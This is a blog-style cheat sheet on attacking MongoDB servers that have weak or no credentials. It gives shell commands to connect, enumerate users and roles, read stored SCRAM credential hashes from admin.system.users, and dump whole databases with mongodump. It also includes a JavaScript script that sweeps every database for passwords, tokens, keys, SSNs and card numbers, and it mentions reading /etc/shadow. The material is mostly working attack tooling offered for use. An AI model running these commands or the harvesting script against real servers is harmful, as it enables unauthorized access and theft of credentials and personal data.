Introduction
There is a plethora of literature on hacking SQL databases, by which I mean going from database access to OS-level command execution or a shell. There seems to be a shortage of information on hacking NoSQL databases such as MongoDB. This article will hopefully give others a jump start when they run into a Mongo database with weak or no credentials (yes, it has happened). It does not list every possibility and is only meant as a cheat sheet. Feel free to list your favorite commands, tips and tricks in the comment section below.
Install mongo client on Kali:
apt-get install mongodb-clients
Note: Current Kali and MongoDB releases ship the newer shell as mongosh (the legacy mongo shell was removed in MongoDB 6.0); the commands below were written for the legacy shell but also work in mongosh.
Connect to DB:
mongo --port <port> -u <username> -p <password> --authenticationDatabase <auth_db> <IP>
Note: Port 27017 is the default value. -u/-p authenticate against the database named on the command line (test when none is given), so for accounts defined in admin, where the built-in administrative users live, add --authenticationDatabase admin. If the server has no authentication enabled at all, plain mongo <IP> gets you in. Giving -p as the last argument with no value makes the shell prompt for the password, which keeps it out of shell history and ps output.
ex: mongo -u foo -p bar 10.10.10.10
ex: mongo -u foo -p bar --authenticationDatabase admin 10.10.10.10
Show server info:
db.adminCommand( { "hostInfo" : 1 } )
ex: db.adminCommand( { "hostInfo" : 1 } )
{
    "system" : {
        "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
        "hostname" : "AwesomePC",
        "cpuAddrSize" : 64,
        "memSizeMB" : 1002,
        "numCores" : 2,
        "cpuArch" : "x86_64",
        "numaEnabled" : false
    },
    "os" : {
        "type" : "Linux",
        "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
        "version" : "Kernel 3.2.0-4-amd64"
    },
    "extra" : {
        "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
        "libcVersion" : "2.13",
        "kernelVersion" : "3.2.0-4-amd64",
        "cpuFrequencyMHz" : "2266.747"
    },
    "ok" : 1
}
Note: hostInfo requires the hostInfo privilege (part of the clusterMonitor role). If it is refused, db.version() and db.serverBuildInfo() still return the server version and build details without special privileges.
Show users:
show users
-or-
db.runCommand( { usersInfo: 1 } )
ex: show users
Note: both list only the users defined on the current database; run use admin first to see the administrative accounts. If the login has read access to admin, every user document (including the stored SCRAM credentials) can be read directly with db.getSiblingDB("admin").system.users.find()
Show roles:
show roles
ex: show roles
Show databases:
show dbs
ex: show dbs
SecretDB    <size of DB>
AwesomeDB   <size of DB>
EmptyDB     (empty)
Note: show dbs needs the listDatabases privilege. If it is refused, you can still switch to any database whose name you already know with use <db_name>.
Use database:
use <db_name>
ex: use SecretDB
Show tables (called collections):
show tables
-or-
show collections
-or-
db.getCollectionNames()
ex: show tables
fluffy
users
List data in the table/collection:
db.<table_name>.find()
ex: db.users.find()
Note: by default the shell prints 20 documents per page; type it to get the next page. Append .pretty() for indented output, and db.<table_name>.count() tells you how many documents there are before you start paging.
Can also set limit with:
db.<table_name>.find().limit(#)
ex: db.users.find().limit(5)
Search for exact match in the table/collection:
db.<collection_name>.find( { <field_name> : "<value>" } )
Note: MongoDB fields are the equivalent of SQL columns. Matching is case sensitive and the value type must match, so the string "1" does not match the number 1.
ex: db.users.find( { name : "Tony" } )
Wildcard search data in the table/collection:
db.<collection_name>.find( { <field_name> : /<value>/i } )
Note: the i after the closing / makes the search case insensitive. Regex matching only applies to string fields, and without a leading ^ it scans the whole collection rather than using an index.
ex: db.users.find( { name : /tony/i } )
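The enumeration steps above (show dbs, use, show collections, find with a regex) done in one pass, as an added example that is not part of the original cheat sheet: a mongo shell script that walks every database and collection the current login can see, samples documents from each, and reports any field whose name or string value matches a keyword regex. It goes beyond the single-collection find() shown above by covering the whole instance. The file name grep_all.js, the KEYWORDS regex and the SAMPLE_LIMIT value are my assumptions; the shell methods used (Mongo.getDBNames(), Mongo.getDB(), DB.getCollectionNames(), DB.getCollection(), cursor.limit().forEach()) exist in both the legacy mongo shell and mongosh.

```javascript
// grep_all.js (assumed name): walk every database/collection and grep fields.
// Regex applied to field names and string values; tune it per engagement.
var KEYWORDS = /pass|pwd|secret|token|key|ssn|card/i;
// Documents sampled per collection; raise it once collection sizes are known.
var SAMPLE_LIMIT = 100;

// Recursively scan one document. Returns [{path, value}] where either the
// field name matches re (the whole value is reported, sub-documents as JSON)
// or the value is a string matching re. Paths are dotted, arrays by index.
function grepDoc(doc, re, prefix) {
  var hits = [];
  prefix = prefix || "";
  Object.keys(doc).forEach(function (k) {
    var v = doc[k];
    var path = prefix ? prefix + "." + k : k;
    // Descend into sub-documents and arrays; a Date is a leaf. Descending
    // into an ObjectId only yields its hex string, which never matches.
    var container = v !== null && typeof v === "object" && !(v instanceof Date);
    if (re.test(k)) {
      hits.push({ path: path, value: container ? JSON.stringify(v) : String(v) });
    } else if (container) {
      hits = hits.concat(grepDoc(v, re, path));
    } else if (typeof v === "string" && re.test(v)) {
      hits.push({ path: path, value: v });
    }
  });
  return hits;
}

// Enumerate every database and collection visible through conn (the object
// db.getMongo() returns in the shell), sample `limit` documents from each and
// collect the matches together with where they were found.
function enumerateInstance(conn, re, limit) {
  var findings = [];
  conn.getDBNames().forEach(function (dbName) {
    var sdb = conn.getDB(dbName);
    sdb.getCollectionNames().forEach(function (collName) {
      sdb.getCollection(collName).find().limit(limit).forEach(function (doc) {
        grepDoc(doc, re).forEach(function (h) {
          findings.push({ db: dbName, coll: collName, id: String(doc._id),
                          path: h.path, value: h.value });
        });
      });
    });
  });
  return findings;
}

// Entry point when loaded by the mongo shell, where `db` is a global; under
// plain node the functions are only defined, which keeps them unit-testable
// against a stub connection object.
if (typeof db !== "undefined") {
  enumerateInstance(db.getMongo(), KEYWORDS, SAMPLE_LIMIT).forEach(function (f) {
    print(f.db + "." + f.coll + " _id=" + f.id + " " + f.path + " = " + f.value);
  });
}
```

Run it with mongo -u foo -p bar --authenticationDatabase admin 10.10.10.10 --quiet grep_all.js (mongosh takes the same arguments). Because admin.system.users is just another collection to this walk, a login with read access on admin will also surface the stored credential hashes there. Expect the regex to produce noise on large text fields; narrowing KEYWORDS or lowering SAMPLE_LIMIT is the quickest fix.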
Dump the DB for off-line grepping:
mongodump -u <user> -p <pass> --authenticationDatabase <auth_db> -h <IP> --db <db_name>
ex: mongodump -u foo -p bar --authenticationDatabase admin -h 10.10.10.10 --db SecretDB
Note: Results are dumped to: dump/<db_name>/<collection_name>.bson. Leave off --db to dump every database the account can read. The .bson files are binary, so convert them before grepping: bsondump dump/SecretDB/users.bson > users.json
Logout:
db.logout()
Note: this drops the authenticated session for the current database; exit (or quit()) closes the shell.
CAVEATS:
The cat() command reads your own files, not the remote system's files.
ex: cat("/etc/shadow") returns your own shadow file :( Bummer, I know!
The same goes for the other shell helpers (ls(), load(), hostname()): they run in the client process on your machine. Server-side JavaScript ($where, mapReduce) does execute inside mongod, but it has no file or network I/O, so it does not hand you the server's files either.